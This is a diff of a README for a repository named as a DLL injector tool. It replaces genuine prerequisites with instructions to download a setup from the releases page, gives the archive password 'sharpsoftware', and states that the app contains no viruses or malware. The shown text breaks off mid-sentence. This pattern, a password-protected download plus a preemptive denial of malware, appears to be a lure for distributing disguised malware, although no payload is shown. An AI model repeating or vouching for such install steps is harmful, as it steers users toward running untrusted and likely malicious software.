sharp4real/dllinjectortool/README.md

 ## ⚙️ Installation

 ### Prerequisites
-- Python 3.7+
+- Go to releases page
-- Windows OS (required for DLL injection functionality)
+- Download setup
-- Administrative privileges (for certain processes)
+- Password is sharpsoftware

 ### Virus/Malware Claims
 This app does not contain any viruses or malware, the actions you process to do on the app may carry out risks, you can